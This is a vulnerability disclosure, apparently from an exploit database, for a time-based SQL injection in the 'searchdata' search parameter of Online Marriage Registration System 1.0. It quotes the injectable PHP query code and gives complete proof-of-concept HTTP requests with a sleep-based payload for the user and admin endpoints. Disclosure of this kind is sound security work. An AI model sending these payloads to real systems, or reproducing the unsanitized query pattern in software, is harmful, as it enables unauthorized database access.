Online Marriage Registration System 1.0 SQL Injection

2020-12-21 / 2020-12-22
Credit: Raffaele Sabato
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Online Marriage Registration System 1.0 - 'searchdata' SQL Injection # Date: 12-21-2020 # Exploit Authors: Andrea Bruschi, Raffaele Sabato # Vendor: Phpgurukul # Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: 1.0 I DESCRIPTION ======================================================================== A Time Based SQL Injection vulnerability was discovered in Online Marriage Registration System 1.0, in omrs/user/search.php and in omsr/admin/search.php. The request is authenticated but it is possible to register a new user account. Following the vulnerable code: $sdata=$_POST['searchdata']; ?> <h4 align="center">Result against "<?php echo $sdata;?>" keyword </h4> <table id="datatable1" class="table display responsive nowrap"> <thead> <tr> <th class="wd-15p">S.No</th> <th class="wd-15p">Reg Number</th> <th class="wd-20p">Husband Name</th> <th class="wd-10p">Date of Marriage</th> <th class="wd-10p">Status</th> <th class="wd-25p">Action</th> </tr> </thead> <tbody> <?php $uid=$_SESSION['omrsuid']; $sql="SELECT * from tblregistration where RegistrationNumber like '$sdata%' && UserID='$uid'"; $query = $dbh -> prepare($sql); $query->execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); II PROOF OF CONCEPT ======================================================================== ## Request user POST /omrs/user/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------197361427118054779422510078884 Content-Length: 320 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/omrs/user/search.php Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2 Upgrade-Insecure-Requests: 1 -----------------------------197361427118054779422510078884 Content-Disposition: form-data; name="searchdata" ' and (select 1 from (select(sleep(5)))a) and 'a'='a -----------------------------197361427118054779422510078884 Content-Disposition: form-data; name="search" -----------------------------197361427118054779422510078884-- ## Request admin POST /omrs/admin/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------267799269040335247322746025522 Content-Length: 320 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/omrs/admin/search.php Cookie: PHPSESSID=d2d3a2cf4e15491144954c85736ee5f2 Upgrade-Insecure-Requests: 1 -----------------------------267799269040335247322746025522 Content-Disposition: form-data; name="searchdata" ' and (select 1 from (select(sleep(5)))a) and 'a'='a -----------------------------267799269040335247322746025522 Content-Disposition: form-data; name="search" -----------------------------267799269040335247322746025522--


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top